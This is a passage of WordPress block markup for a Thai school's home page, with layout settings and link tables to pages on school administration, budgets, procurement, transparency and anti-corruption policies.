/wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_bf6039-24\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_bf6039-24\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=469\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_d4f0fe-83\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_d4f0fe-83\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=605\" data-type=\"page\" data-id=\"605\">ข้อมูลบุคลากร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_f5c57d-b9\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_f5c57d-b9\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=496\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=496\">ข้อมูลนักเรียน</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e5e0c341\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":503,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\"} -->\n<figure class=\"wp-block-image size-full\"><a href=\"http://eita.ssk.in.th/eit_admin.php\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/Is-It-a-Gift-Instagram-Post.png\" alt=\"\" class=\"wp-image-503\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1314,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\"} -->\n<figure class=\"wp-block-image size-full\"><a href=\"http://eita.ssk.in.th/eit.php\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/1.png\" alt=\"\" class=\"wp-image-1314\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1315,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\"} -->\n<figure class=\"wp-block-image size-full\"><a href=\"http://eita.ssk.in.th/eit_admin.php\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/2.png\" alt=\"\" class=\"wp-image-1315\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"54d1190a\",\"isDynamic\":true,\"blockVersion\":4} /-->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"9l7bo6vn\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"showTaxonomy\":false,\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"showPagination\":true,\"postsPerPage\":\"2\",\"headingText\":\"วิดีโอกิจกรรมโรงเรียน\",\"headingStyle\":\"heading5\",\"headingHide\":false,\"category-terms\":[{\"label\":\"วิดีโอกิจกรรมโรงเรียน\",\"value\":\"%e0%b8%a7%e0%b8%b4%e0%b8%94%e0%b8%b5%e0%b9%82%e0%b8%ad%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99\"}],\"headingBgColor\":\"#ff6900\"} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=546\">โครงสร้างและอำนาจหน้าที่</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=469\">ข้อมูลผู้บริหาร</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=362\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=362\">ข้อมูลการติดต่อ</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=355\" data-type=\"page\" data-id=\"355\">ข่าวประชาสัมพันธ์</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและการใช้จ่ายงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=1704\">แผนกลยุทธ์หรือแผนพัฒนาคุณภาพการศึกษาของสถานศึกษา</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=1754\">แผนปฏิบัติการและความก้าวหน้าในการดำเนินงานและการใช้งบประมาณประจำปี</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=784\">คู่มือหรือแนวทางปฏิบัติงานของครู และบุคลากรทางการศึกษา</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=459\">E-Service</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=1540\">รายการการจัดซื้อจัดจ้างหรือการจัดหาพัสดุและความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ ประจำปีงบประมาณ พ.ศ .2568</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=1571\">รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี งบประมาณ พ.ศ .2567</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=566\" data-type=\"page\" data-id=\"566\">แผนการบริหารและพัฒนาทรัพยากรบุคคล</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=1003\" data-type=\"page\" data-id=\"1003\"></a><a href=\"http://pakhaeng.ssk.in.th/?page_id=900\" data-type=\"page\" data-id=\"1003\">ประมวลจริยธรรม และการขับเคลื่อนจริยธรรม</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=712\" data-type=\"page\" data-id=\"712\">แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=476\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=859\" data-type=\"page\" data-id=\"859\"></a><a href=\"http://pakhaeng.ssk.in.th/?page_id=859\" data-type=\"page\" data-id=\"859\">ประกาศเจตนารมณ์และการสร้างวัฒนธรรม ตามนโยบาย No Gift Policy จากการปฏิบัติหน้าที่</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=1032\">การประเมินความเสี่ยงที่อาจเกิดการให้หรือรับสินบนจากการดำเนินงานตามภารกิจของสถานศึกษา  ประจำปีงบประมาณ พ.ศ .2568</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>การส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=1697\" data-type=\"page\" data-id=\"1010\">แนวทาง/โครงการ/กิจกรรมการป้องกันการทุจริต</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=1594\">มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในสถานศึกษา</a></td></tr><tr><td></td></tr><tr><td></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"stv6u8re\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showMeta\":true,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"headingColor\":\"#ffffff\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"titleHoverColor\":\"#ff6900\",\"titleWeight\":\"500\",\"titlefSize\":{\"md\":16},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":12}} /-->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"%e0%b8%82%e0%b9%88%e0%b8%b2%e0%b8%a7%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99\"}],\"headingColor\":\"#ffffff\",\"headingHoverColor\":\"#000000\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"titleHoverColor\":\"#ff6900\",\"titleWeight\":\"500\",\"titlefSize\":{\"md\":16},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":12}} /-->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":40},\"thumbnailHeight\":{\"md\":200},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#000000\",\"headingHoverColor\":\"#ffffff\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleHoverColor\":\"#ff6900\",\"titleWeight\":\"500\",\"titlefSize\":{\"md\":16},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"y6fpy3h2\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"วารสารประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"วารสารประชาสัมพันธ์\",\"value\":\"%e0%b8%a7%e0%b8%b2%e0%b8%a3%e0%b8%aa%e0%b8%b2%e0%b8%a3%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"viewBgColor\":\"#27ccc105\",\"headingHoverColor\":\"#ffffff\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n\n<!-- wp:kadence/rowlayout {\"uniqueID\":\"14_bd7bab-81\",\"columns\":1,\"colLayout\":\"equal\",\"firstColumnWidth\":0,\"secondColumnWidth\":0,\"thirdColumnWidth\":0,\"fourthColumnWidth\":0,\"fifthColumnWidth\":0,\"sixthColumnWidth\":0,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"14_a02c00-db\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column14_a02c00-db\"><div class=\"kt-inside-inner-col\"><!-- wp:kadence/tabs {\"uniqueID\":\"14_8cac31-6c\",\"tabCount\":2,\"currentTab\":2,\"contentBgColor\":\"rgba(171,184,195,0.02)\",\"contentBorderStyles\":[{\"top\":[\"#bcbcbc\",\"\",1],\"right\":[\"#bcbcbc\",\"\",1],\"bottom\":[\"#bcbcbc\",\"\",1],\"left\":[\"#bcbcbc\",\"\",1],\"unit\":\"px\"}],\"tabAlignment\":\"center\",\"titles\":[{\"text\":\"E-SERVICE\",\"icon\":\"fe_box\",\"iconSide\":\"left\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"},{\"text\":\"เมนูระบบบริการ\",\"icon\":\"fe_airplay\",\"iconSide\":\"left\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"}],\"titleColor\":\"#000000\",\"titleColorHover\":\"#f78da7\",\"titleColorActive\":\"#ff6900\",\"titleBg\":\"var(\\u002d\\u002dglobal-palette9, 